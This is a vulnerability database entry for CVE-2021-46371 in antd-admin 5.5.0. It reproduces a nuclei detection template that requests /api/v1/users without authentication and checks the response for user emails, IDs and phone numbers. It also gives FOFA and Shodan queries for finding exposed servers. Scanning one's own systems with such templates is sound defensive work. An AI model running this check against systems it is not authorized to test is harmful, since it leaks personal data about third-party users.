Lucene search
K

AntD Admin - Sensitive Information Disclosure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

AntD Admin suffers incorrect access control enabling unauthorized access and leakage of sensitive user data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-46371
14 Feb 202216:15
attackerkb
Circl
CVE-2021-46371
14 Feb 202218:32
circl
CNNVD
AntD Admin 访问控制错误漏洞
14 Feb 202200:00
cnnvd
CVE
CVE-2021-46371
14 Feb 202215:22
cve
Cvelist
CVE-2021-46371
14 Feb 202215:22
cvelist
EUVD
EUVD-2021-33054
3 Oct 202520:07
euvd
NVD
CVE-2021-46371
14 Feb 202216:15
nvd
Prion
Improper access control
14 Feb 202216:15
prion
Positive Technologies
PT-2022-12677
14 Feb 202200:00
ptsecurity
id: CVE-2021-46371

info:
  name: AntD Admin - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    AntD Admin has a security vulnerability that stems from Antd-admin 5.5.0 being affected by an incorrect access control vulnerability. Attackers can exploit this vulnerability to gain unauthorized access to some front-end interfaces, resulting in the leakage of sensitive information such as user IDs, names, ages, phone numbers, addresses, and more.
  impact: |
    Unauthorized users can access sensitive information, leading to potential data leakage and privacy breaches.
  remediation: |
    Update to the latest version of antd-admin that addresses access control issues.
  reference:
    - https://github.com/zuiidea/antd-admin/issues/1127
    - https://github.com/zuiidea/antd-admin
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46371
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-306
    cve-id: CVE-2021-46371
    epss-score: 0.04305
    epss-percentile: 0.8997
  metadata:
    verified: true
    max-request: 1
    vendor: zuiidea
    product: antd-admin
    fofa-query: 'body="/@@/devScripts.js" && body="//! umi version:" && body="/umi.js"'
    shodan-query: html:"/umi.js" html:"@@/devScripts.js"
  tags: cve,cve2021,antdadmin,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/users"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'email":'
          - 'data":[{"id":'
          - 'phone":"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200f302aa4fa97a1aabf15edec02ede92248d4acbbf69de716c3be05adca34c618022100e48b2d8b7d412293c612f1b443a61cc4ef6f6aff0565634632a4054615138ab7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 11:08Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.04305
32